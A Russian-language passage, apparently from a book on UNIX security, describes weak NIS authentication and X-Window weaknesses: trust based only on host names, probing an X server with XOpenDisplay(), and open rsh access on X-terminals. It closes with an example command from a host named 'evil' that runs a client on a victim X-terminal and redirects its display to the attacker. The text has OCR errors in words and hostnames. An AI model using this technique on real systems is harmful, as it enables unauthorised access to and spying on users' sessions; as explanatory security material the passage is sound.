Таким образом, становится ясно, что NIS была ненадежной службой, которая

Почти не имела аутентификации клиентов и серверов, и если атакующий

Управлял активным NIS-сервсром, то он также мог бы эффективно управлять

Хостами клиентов (например, выполнять произвольные команды).

Особенности безопасности X-Window

Оконная система UNIX, в отличие от оконной системы другой фирмы, явля-1

Ется сетевой, поддерживающей сервер и клиента. Ее наличие на компьютере

Может быть обнаружено, в частности, с помощью сканирования портов. Порт

X-Window - обычно 6000.

Сервер X-Window аутентифицировал своих клиентов только по имени хоста, с

которого они подключались. Если же он "доверял" всем хостам, то его окна

Могли быть захвачены или просмотрены, ввод пользователя мог быть украден,

Программы могли быть удаленно выполнены и т. п. Одним из методов

Определения уязвимости Х-сервера является подсоединение к нему через

Функцию XOpenDisplay(). Если функция возвращает не NULL, то доступ можно

Получить.

Х-терминалы, гораздо менее мощные системы, имели свои проблемы по части

Безопасности. Многие Х-терминалы разрешали неограниченный rsh-доступ,

Позволяя запустить Х-клиенты на терминале victim, перенаправляя вывод на

локальный терминал:

evil% xhost +xvictim. victim, com

evil% rsh xvictim.victim.corn telnet victim.corn -display evil. corn